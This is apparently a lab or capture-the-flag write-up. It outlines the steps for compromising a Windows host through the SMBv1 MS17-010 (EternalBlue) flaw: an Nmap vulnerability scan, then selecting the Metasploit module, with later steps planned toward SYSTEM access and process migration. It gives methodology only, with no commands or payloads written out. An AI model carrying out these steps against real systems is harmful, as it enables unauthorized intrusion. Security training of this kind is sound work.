Objective:
Identify a vulnerable Windows host, exploit the SMBv1 MS17-010 vulnerability, gain a Meterpreter session, escalate privileges, and migrate to a stable SYSTEM-owned process.
- Recon - Scan target for services and vulnerabilities.
- Exploit Selection - Choose appropriate exploit in Metasploit.
- Payload Setup - Configure payload and options.
- Initial Access - Gain shell access via exploit.
- Session Management — Background and upgrade shell to Meterpreter (if needed).
- Privilege Verification — Confirm NT AUTHORITY\SYSTEM access.
- Process Migration — Move Meterpreter to a stable SYSTEM process for persistence.
My first step was to identify running services, their versions and any associated vulnerabilities. To do this I ran Nmap with the --script vuln tag to enumerate common vulnerabilities. This exposed the smb-vuln-ms17-010 (CVE-2017-0143, Remote Code Execution via SMBv1)
With the information gained from the scan, I then moved over to Metasploit. I ran a search for the exposed vulnerability and was able to select the appropriate exploit, in our case it is; ms17_010_eternalblue.
